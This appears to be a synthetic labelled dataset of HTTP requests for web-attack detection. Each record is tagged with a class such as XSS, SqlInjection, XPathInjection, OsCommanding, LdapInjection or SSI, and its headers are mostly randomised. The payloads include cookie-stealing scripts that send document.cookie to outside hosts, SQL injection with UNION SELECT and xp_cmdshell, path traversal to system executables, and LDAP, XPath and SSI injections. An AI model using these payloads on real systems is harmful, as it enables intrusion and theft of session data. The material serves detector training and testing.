User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 2.2; iy-sn; rv:7.4.1) Gecko/69380129
UA-Disp: 6967,915,8
UA-Color: color32
UA-Pixels: 743x0434
Via: HTTP/1.4 www.CeBt.jpeg, so3rta/6.5 203.159.195.80
Upgrade: dnt/1.2, rrawwe/6.8, 3ubno/2.4, ixhhi/3.4
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40736
Start - Id: 46946
class: XSS
POST /ePxY5FgE1SizoO/s6htneIwfa4ig.png? HTTP/1.0
Content-Length: 345
Content-Language: uerit
Content-Encoding: gzip
Content-Location: http://www.h6ettue.de/8bipn/nAutt/5altbtl/2Jmt/ai2ds.htm
Content-MD5: a29zbmFhMWx0N3J4SWlueQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 16:34:30 CET
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: www.poiTI.cz
Connection: close
Accept: audio/x-wav;q=0.9, video/*, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n5eycr-Ixi, qIatA-5mla;q=0.7, jaydgei8-px, R8eo-Efd;q=0.2
Cache-Control: no-transform
Client-ip: 19.178.124.208
Cookie: afys3nrelsN=nmnertiw
Cookie2: $Version="22"
Date: Tue, 27 Sep 05 13:51:02 CET
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Mon, 27 Jul 09 08:32:19 GMT
If-Unmodified-Since: Tue, 25 Jan 05 14:17:47 UTC
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 0.6
Pragma: p9hhai93='Thmsaurf'
Authorization: Digest response="7a0eeee0f9Ce72e33Fd3E049A3EC807d"
Range: 16111-
Referer: http://www.elnohtn0.fr/Veogstai/lnlt1eaI.cfm
TE: trailers,deflate;q=0.8,trailers
User-Agent: eiTdhee63FakaAu8en9s
Via: 1.4 171.15.76.222, FTP/9.9 248.146.7.124
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eNeeitsthwsrem=oiZqcl9ay44iw1hhs&ZTalAJZxi=eraanaevanUser&dsteuTdTtYoisyb=Y &OIctcks5lhun=[\xC0][\xBC]script   >[document.location.replace   ('http://www.gelameve.com/cgi-bin/ic.cgi'+document.cookie);][\xC0][\xBC]/script >&ntsNdtie=06374&aa1osaLfi9tago=lnFMMktW&n6U=39330&aroFEag=177683658

End - Id: 46946
Start - Id: 42747
class: SqlInjection
POST /eeoac8tedlonnrry/piRtk/qAg/iu5treEa2bwl/aTQidqIS7/RsD4useuu1rletbrofr/uQIKQ.MO1WZUw/r9omdueAforeofTozo.jsp? HTTP/1.1
Content-Length: 199
Content-Language: wb3gUnoe
Content-Encoding: compress
Content-Location: /rfmfn/5Lve/tteaH/7tec9u.nsf
Content-MD5: ZXN0bmVvbm5sdG5haWhjVA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jul 04 03:58:21 CET
Last-Modified: Sat, 01 May 04 09:56:27 GMT
Host: www.tolg.com
Connection: aOod
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=128
Client-ip: 190.248.104.33
Cookie: a8Gadnefbxxua=i<;iBpselu9aphqtke=rn5rw'     UNION /**/    SELECT    dt5shrsa FROM    dba_users     WHERE to     like  '%25
Cookie2: $Version="3"
Date: Sat, 22 Jan 05 04:58:59 UTC
ETag: "BOPBRVX@KsK5C5D"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Sat, 29 May 04 19:11:54 GMT
If-Unmodified-Since: Sat, 07 Aug 04 13:30:50 GMT
If-Match: *
If-None-Match: *
If-Range: "PoVGzvl09iBulTTBY1HF"
Max-Forwards: 45
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: iurtN aqadDau=s2ape
Authorization: Digest realm
Range: -47883,920284-33663,-174
Referer: http://bneotbrn.de/cwrha/4cdzw/seaa/7glss.swf
TE: gzip;q=0.2,gzip;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 2.0; tc-re; rv:3.4.3) Gecko/98816904
UA-CPU: StrongARM
UA-Disp: 268,786,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1222x7827
Via: FTP/6.1 www.e9ejsg.shtml
Transfer-Encoding: aaFpis; ilc2sx=hwst
Upgrade: tgK/9.1, gaesln/8.0, 4lDidv/1.3, oiolt/7.5
Warning: 234 www.a6cau7h.css "tmiou65oosao" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 40137446111101
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

1OKaj25=likeodt&KjlhJHRC=e&ierqpieree8=<b'likexylink3e1ez3ml1&APYAHr6=oti@&hwoI=7971&easYltfseio=ngLh&nqs=sOs&io5sItupsa51vet=arBaoC&olzaacea1oR=80053&tsBnihtairt=39&hY=586&alobpt=dekO wi'cr5

End - Id: 42747
Start - Id: 35791
class: XPathInjection
GET /reCnosnct/nebJmvUbFiAvO/ivNeu/IEgroup bylpositionnodeXfzH/nenxSmtlvirfl6atepe/3DFgIAUVgiQ3A5/06lj5774B5jwZ/11WqgLiMjJMMDUsnVK/teRritHeazcruHP/rDUIpckm31ZWV@JbsHW.css?1I4lT=ueitp%2Fre0dqj%2F7psec%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D104%5D+++%7C++++r1%2Ft%2FI%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D12%5D+++or+%27oesn%27++++%3D+++%27 HTTP/1.1
Host: www.etjante.gov
Connection: aktrs
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip;q=0.9, gzip;q=0.9, deflate;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="051"
Date: Wed, 08 Jun 05 01:12:44 GMT
ETag: "BC6ce8C_dnKt4s0Z."
Expect: eenre=cursi6
If-Modified-Since: Sun, 24 Jan 10 17:33:25 CET
If-Unmodified-Since: Sat, 04 Apr 09 13:48:47 UTC
If-Match: *
If-None-Match: "g6QYtjMv@aKnBDu_thq0"
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 260
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest username="eahAd"
Referer: /t1mlewS/Eossioh/ecasszsk/wb4Rg6n.htm
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 2.5; wv-nf; rv:0.2.6) Gecko/78321377
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: gzip
Upgrade: n2smtz/0.7
Warning: 396 72.31.252.105:54837 "8rfz" "Tue, 15 Dec 09 08:04:48 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35791
Start - Id: 44240
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: 132.150.236.171:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="9"
Date: Thu, 24 Jan 08 07:01:54 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: uNcro
From: ided@udhoes.uk
If-Modified-Since: Wed, 01 Mar 06 01:04:52 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Apr 10 21:54:56 CET
Max-Forwards: 91
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 347-
Referer: /sahifuno.php
TE: trailers,chunked,chunked
Trailer: Proxy-Authorization
User-Agent: izzcaelzshS
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: compress
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 60134269598248
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44240
Start - Id: 48807
class: XPathInjection
GET /apNOKzo/deboot.iniS1qCcat@75CHU/ehV5jjK95/KZe-a7Dnhsam@93/eht0dninLsrBennaoz/s9isoeei.mspx?t0iebrauhte56=3niheexAb7s9eqWcoe&r8v=kcIKq_J0yeg&hfailokoh=nenjuytieeHe&krAsnvhytEe=m9tmiArab3w&tctewlterml1I=%28i+%3C+count%28WEEbr%2Fchild%3A%3Atext%28%29%29+and+j++++%3C++++count%28whtdS%2Fchild%3A%3Acomment%28%29%29+and++++k+++%3C++count%28sn9me%2Fchild%3A%3A*%29+%29&8-servicesgh=eiEonaft&iir8hEou5siK=e4aanachtslncXa&evt1ix23xytsh=Arff+ttoncscriptLpxe&rmutoe=7164554840&srah9svenogah4=mCtwL_T%407&het5aaesdatb=af%28nc5ns%3E%25eh%3Dtea&v1sremi=vrTu0FZml&e_jHk=2eC2swld&hr43ioqjmtip=sn5&TS3.xF@t=f0ehj0lltt HTTP/1.0
Host: www.shrecyf.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.5, iso-8859-6;q=0.2, iso-8859-9;q=0.9, windows-874, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: db8ltAoq-hs;q=0.0, rd2a-wssex;q=0.0
Cache-Control: only-if-cached
Client-ip: 5.230.196.145
Cookie: eign3tsSaaaioon=144205;tfeit=nprtpst;ftpLMxqN=3848470118;Acp7nrdo1=u+/sAftpl
Cookie2: $Version="7"
Date: Fri, 29 Aug 08 15:11:35 CET
ETag: "VO5FnVJ6E4qjyUA"
Expect: 100-continue
From: 2geofch9@4eke.org
If-Modified-Since: Sat, 01 Aug 09 07:25:27 UTC
If-Unmodified-Since: Mon, 03 May 10 12:59:32 GMT
If-Match: "46Wnu8zuFB0Kz6jfl"
If-None-Match: *
If-Range: Sun, 27 Dec 09 20:18:03 CET
Max-Forwards: 3221
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: /ThcR/rnort9/sEh9gesi/wGtc2/umdb.swf
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: Mozilla/6.3 (compatible; Konqueror/2.3; Unix; ecutx7oerS; slr3)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/4.0 165.129.237.54:6, HTTP/0.1 36.39.48.24, 3.4 118.174.161.149
Transfer-Encoding: deflate
Upgrade: 71emX/6.2, hao/6.3, scEf4/7.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48807
Start - Id: 40996
class: SqlInjection
POST /LB3wwG@Mbselect/wkpXJdTPm4oHeIU7/nLk_w/niee/anstEhimc/xmldroppudO3F/d26eer7ia2i9rA/iLte0ma3luta/hArt/1fetteaAnmQg1Idnahj/acceptH/stt9nto2.php3? HTTP/1.1
Content-Length: 215
Content-Language: eNt
Content-Encoding: deflate
Content-MD5: cnN5TmN1ZmhndHNvaWxwZA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 04 Apr 10 01:34:57 GMT
Host: www.ortelI.cz
Connection: close
Accept: image/png
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: R4eenboe-nesfwde, aOxtcoe-Ih4, 3hHNh-ai, DeH1-aemEii;q=0.8, i-tlna26da
Cache-Control: no-cache
Client-ip: 248.121.203.33
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="889"
Date: Fri, 28 Dec 07 13:53:33 UTC
ETag: "vXvN5UnvPs4m@hSmv5"
Expect: 100-continue
If-Unmodified-Since: Fri, 27 May 05 09:08:31 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Dec 09 22:13:53 GMT
Max-Forwards: 975
MIME-Version: 8.3
Authorization: 9etso itrab=ohxvo2N
Referer: /l2wgz/0qsnrap/amelt1eT.jsp
TE: deflate
Trailer: Accept-Charset
User-Agent: imtonc (eijhwNEy2g)
UA-Pixels: 892x2342
Via: 6.6 239.119.208.26:7, sru/3.0 www.ona8s.png, 6.4 www.eemi.jpg
Transfer-Encoding: gzip
X-Forwarded-For: 181.40.75.124

fnoni=97&8f=7o:O&olnvh=grS&L7m=onLhP7ASU-&faadminlsWtX4jJc=iti&tavo=1446&seI=mihYotnOkUeeeniD0&allpdfWU=do emcesh3&Yie1s3qdtsd=CIYioM7af8tncdeea3&nao=';EXEC   master.dbo.xp_cmdshell 'cmd.exe&Z0ewnLrd4re=rmte

End - Id: 40996
Start - Id: 38048
class: LdapInjection
GET /lXNMk.pl?n8aoiscnbsiqo=usrh&vn0sgU=Togjeh&iniAdSte9otn6=%29++%28+%7C+++%28displayName%3Dhad*%29++%28name++++%3D++++had*+++%29%28+mail%3Dhad*%29&82WEs91=9&xmlRHevalkQ7v5=jgdno4o&RyKUyb=OWl&gnddioye=tF0KLw72JBkH HTTP/1.0
Host: 80.46.146.68
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: t5naqeasolsIBli=n.225RvR4hZX;ghosoh=11611
Cookie2: $Version="114"
Date: Thu, 29 Sep 05 06:50:03 GMT
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: deigiel@Ostrbaef.it
If-Modified-Since: Wed, 28 Oct 09 16:23:12 CET
If-Unmodified-Since: Fri, 19 Feb 10 04:04:32 GMT
If-Match: "6DXCmkLeJQ1jlnI"
If-None-Match: *
If-Range: *
Max-Forwards: 64
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest cnonce="cz8e8weo"
Range: 6583-,350-4,-7502
Referer: /lna4iewn/i6tpiyo.css
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: esaotq/2.6.5.2
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 5n36a/5.4 183.119.213.129, 3.9 146.67.78.34
Transfer-Encoding: gzip
Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38048
Start - Id: 49004
class: XPathInjection
GET /sEe6@/eppeAbl3rnek/pCtawHV13.2/dMALu8tOV3OMjb/e8N1t6PAo/ootEejd/hVBJx9uUjzSgVSyVWAYd/e@3r_6m.K/s4FZK@k9zyAPesre/n5uceI3enceaetd1.css?iakTbegamia9set=aepp&8nitrrio=Meemnbls0aTn8y&odejtriatIsqiol=9g1TE&jRbnrcoxcruoa=y%28&eTg74xrtly7yd2t=wiceq&nan=adMZCYCmdJOj&xqnt=ST%5De5AyfhraS&6ia8euidaNkqeoo=nsssbetweenthf+0+u&d1Ko6=s%5C%3Br&renm=9537787&2Mv_jxObTZ1=%28i++%3C+count%28oa9%2Fchild%3A%3Atext%28%29%29++++and+++j++++%3C++count%28zeme%2Fchild%3A%3Acomment%28%29%29+and++k+%3C+count%28s8aPt%2Fchild%3A%3A*%29++++%29&C_Ub9access_log-FXZPn=aenfaccept HTTP/1.0
Host: 43.111.62.247:80
Connection: keep-alive
Accept: audio/*, image/png;q=0.9, application/*;q=0.5
Accept-Charset: x-mac-korean, koi8;q=0.9
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.8
Cache-Control: max-stale=64491
Client-ip: 65.168.75.165
Cookie: 6noamn=s
Cookie2: $Version="6"
Date: Sat, 19 Sep 09 19:51:44 UTC
ETag: W/"F3Wy2S.1Nr_Pm@MqEZXo"
Expect: 100-continue
From: w6wr@nytn.it
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Tue, 07 Apr 09 09:03:04 UTC
If-Match: *
If-None-Match: *
If-Range: "Nkl_1cQDSzNpyd8aNW"
Max-Forwards: 1563
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic dGVlcm46aW1jeGlh
Range: -520,420265-,87-062067
Referer: http://vtmeeq.cz/ctte/tepet5sq/AobbTt/oSroo/6sgs.fgf
TE: deflate,chunked
Trailer: Accept
User-Agent: Mozilla/4.1 (compatible; MSIE 0.0; Unix; oIn0Auttp)
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4233x4601
Via: 2.4 197.55.30.48
Transfer-Encoding: gzip
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49004
Start - Id: 41952
class: SqlInjection
GET /savwwVenr.shtml?t8o1se=ia9yeecuforn7v&saCe0itcoce4WN=0590191&rha=%3B+++exec+++get_cust%28++++%27x%27%27++++union+++++select+object_name%2Cobject_type%2C%27%27x%27%27+++from+user_objects++++where++++%27%27bDoot%27%27+%3D%27%27%27+++%29%3B&rguW0s1oa=Sh&qjrOOidpOvHdtes=e0sam HTTP/1.1
Host: 12.87.145.82
Connection: wHlcmt
Accept: audio/*, application/x-tar
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sul-efsetef;q=0.4, nemgy-t;q=0.0, s8e-if, sr2-hefitpr
Cache-Control: no-cache
Client-ip: 152.104.66.182
Cookie: oeftrraa=e7aa2;aei=lsnL;afa5iraNdeulnf=jjw9husP;KWOZPservicesZ=pT0F73FvQo;etrtAefgetieZta=091065
Cookie2: $Version="26"
Date: Tue, 10 Jul 07 13:39:35 GMT
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: w9indwk=ssrsuoT
From: hbenOu@tnrYidAeoh.net
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Fri, 09 Feb 07 11:25:07 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9151
MIME-Version: 6.3
Pragma: taunjemm='O'
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: Digest username="aEmaxdo"
Range: 55660-
Referer: /eNFsbef/crai/ns0on.rar
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: huigu (pOLjwQT@.; i27DPk6d)
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: compress
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 346 34.138.57.132 "dh7piowEhlanirTtsTh6" 
X-Forwarded-For: 116.82.96.232
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41952
Start - Id: 48332
class: XPathInjection
GET /zgr8sSl4moo9/of8EtitaubXsmcrR9cnt/rola2reolya0/haFGuvy/htn4ssejw3nfkobau/etFyaAhWoeyR9S5G/oe8skre/ntjyJUK4Pm_.dll?@k4dWd=i_lNGq&qstfagyaebpo=zec4&on9de0ndix=csceHtuomaPlerf&scqc0e=ordsnCiitsh8k&72bGjWjhCr=01438187&wv=trEo&nulabethyWp=iac&9vpigtkds35y=1649944&JgONiuncvPc=x-57BhS9HE&ercsonuh3aea4=owht&iferoofe=hn+&oiiye6bE=gTmE&uecrvnnnbh=3&mshsn4=%27&R7=iEj HTTP/1.1
Host: www.n8BaoioSct.ch:10950
Connection: close
Accept: audio/x-wav;q=0.7, application/x-tar;q=0.3, application/*
Accept-Charset: iso-8859-7, iso-8859-5;q=0.7, windows-1257, iso-8859-2;q=0.7, iso-2022-kr
Accept-Encoding: 
Accept-Language: tdTiedhu'  or    6   < count(path/child::*)     or  'sSosiott'   =   '
Cache-Control: no-store
Client-ip: 81.91.23.142
Cookie: jh=bodyoeF6z8neadminld;uttNxbdtrhcgs=O3wgetg rdor
Cookie2: $Version="474"
Date: Tue, 12 Oct 04 05:41:39 UTC
ETag: "-RMFIZkZYhEP_S2f"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Mon, 07 Mar 05 17:36:54 CET
If-Unmodified-Since: Sun, 13 Feb 05 16:54:05 CET
If-Match: "Kq0u4FsN6qqfams"
If-None-Match: *
If-Range: Tue, 20 Nov 07 05:08:30 GMT
Max-Forwards: 301
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM c2lpbmRlaGdvdXlpb29vZXBudG9vbHN3YmZubm9jZXpvaTJzYXc4aA==
Range: 8313-,-86247,250-55725
Referer: http://www.debaP.st/ugla6Ore/unvauoo.mspx
TE: deflate;q=0.6,chunked;q=0.0
Trailer: Warning
User-Agent: Mozilla/2.0 (X11; U; Open BSD i386 8.9; ep-no; rv:6.1.8) Gecko/92927900
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 433x249
Via: hmlYli/8.3 117.32.197.73, FTP/2.7 225.36.72.236
Transfer-Encoding: gzip
Upgrade: eta/7.4, auRa/8.4
Warning: 922 www.shedURse.gif "43Mra" 
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 6875195
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48332
Start - Id: 36469
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.7gStiD.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-ce, macintosh, iso-8859-1, us-ascii;q=0.2
Accept-Encoding: identity
Accept-Language: rp-metnp;q=0.1
Cache-Control: no-transform
Client-ip: 171.165.21.220
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="4"
Date: Wed, 02 Mar 05 03:01:29 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Fri, 16 Apr 10 18:55:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 896
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM d3NlZGVTZWJ0bG1oNzNuZGNjb2VpZDBhc2E2ZXJmMWI4b2NkZGFt
Range: 57-,410056-,436232-1281
Referer: http://o4Eedi.cz/SjrejfE/mH7me/DhOkn/tawr5t.sh
TE: trailers,gzip
Trailer: Accept
User-Agent: oKSD04 http://www.elrvq.biz
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 3.4 www.wsi1.gif, 7.9 www.pntpsf.jpeg, 6.9 www.40SUl7wt.jpg
Transfer-Encoding: essd
Upgrade: fet/9.1, iro/2.9
Warning: 011 www.qtp2.jpeg "qrH18z" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36469
Start - Id: 47593
class: XSS
GET /iYU8G4xzX/a91oateIuvdlte/ewZytLL1cls/zassrt5t3a/3ClEtMvar_kcZ/IJnR/@nB3/of6er/rdsd5mnaaAdeie8mnirg.nsf?3afkmt=176&IasexecQZc8Ryc=tutetylenas%3Ceeathavingna&6wE8wuEalrdrci=%3Cxml+id+%3D+%22+++++X+%22+%3E%3Ca++++%3E%3Cb++%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F254.230.206.93%2Fri.php3%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb%3E%3C%2Fa++%3E%3C%2Fxml%3E&iraoodarep=edivt5update%2FHPjnma+mjperl&ffRHhwget=63729 HTTP/1.1
Host: www.stSo.cz:1730
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ijrssex-aR, ej-2hhiaano;q=0.7, tibe3ann-a;q=0.4, erayala-ooed;q=0.5, vhnyf-f;q=0.4
Cache-Control: max-stale
Client-ip: 27.137.73.171
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Wed, 22 Jul 09 01:34:16 UTC
ETag: W/"k.NJardhH9CSLO.eFKv"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Sat, 01 Mar 08 18:36:48 CET
If-Match: "TK4w2_l4UFdHIqZGd"
If-None-Match: *
If-Range: *
Max-Forwards: 411
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: /asenc1h.exe
TE: deflate,trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/2.0 (Machintosh; U; PPC Mac OS X 6.7; he-on; rv:6.2.9) Gecko/00529973
UA-CPU: x86
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 428x2370
Via: 8eln3n/1.4 www.anntb.js
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47593
Start - Id: 39292
class: SSI
GET /oeMa0snIs/aLx7OHNg0uw8BQ4D31yF/DKvar/er/s8tratd6aAt8nEaa1/@AkyM24VOA/tXH/sIqtnnyiAttatqri/eoee/7ifi/trSRE.cgi?ILbtlsdohcytm=9o&nusenbiit8wb=n&cwse=%3C%21--%23email+fromhost%3D%22www.ae1agn1.com%22+tohost%3D%22mailbox.mtt.com%22+message%3D%22ssf2+dplia3+9o+teh%22+fromaddress%3D%22ytebqa.com%22+toaddress%3D%22rhnr.21.com%22+subject%3D%222r%22+sender%3D%22sUh.com%22+replyto%3D%22anvniht.com%22+cc%3D%22ecS%22+inreplyto%3D%22hxBd+ter+xeufe%22+id%3D%22aemail%22+--%3E&othjftcoRb4=vYI HTTP/1.0
Host: www.nlhwSov.de:0222
Connection: close
Accept: text/plain;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: nth5Tr-woxm4t;q=0.5, cl-ysst
Cache-Control: eeeAdgn=em
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Wed, 26 Aug 09 02:09:05 CET
ETag: W/"9ib8ik4X3d-J0zUTbY"
Expect: 100-continue
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Mon, 27 Jul 09 04:06:42 GMT
If-Match: *
If-None-Match: "Ohb_@MSYNk.0vicdi"
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 469
MIME-Version: 6.8
Pragma: ieyern=w
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: Digest nc=e472deD1
Range: 7-228,-05193
Referer: /erwtmda4.dll
TE: trailers,gzip,chunked
Trailer: Host
User-Agent: Mozilla/8.2 (X11; U; Unix 6.0; co-i5; rv:3.8.9) Gecko/71109449
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 573x190
Via: FTP/0.9 www.tnjmnf.css, soh/5.7 81.206.157.53
Transfer-Encoding: deflate
Upgrade: m0oet/4.8
Warning: 243 www.sr5ots.htm "h5poe8s" 
